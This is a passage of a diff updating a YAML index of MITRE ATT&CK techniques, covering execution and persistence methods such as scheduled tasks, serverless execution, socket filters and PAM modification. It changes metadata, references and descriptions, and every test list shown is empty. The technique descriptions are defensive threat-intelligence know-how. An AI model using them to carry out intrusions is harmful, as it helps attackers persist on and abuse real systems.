         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -27093,12 +27466,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -27155,11 +27527,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -27224,14 +27595,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -27252,14 +27622,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -27268,16 +27643,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -27303,6 +27680,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -27317,29 +27702,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -27352,25 +27718,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -27420,17 +27802,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -27493,7 +27874,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -27527,8 +27908,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -27537,6 +27918,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27549,29 +27934,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -27618,7 +28003,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27650,8 +28035,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27665,6 +28050,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27677,16 +28066,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27749,7 +28141,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27814,49 +28205,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27871,20 +28223,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27974,7 +28363,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -28062,7 +28450,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -28147,11 +28534,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -28229,7 +28615,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -28262,7 +28647,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -28285,11 +28670,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28347,9 +28731,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -28430,12 +28813,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
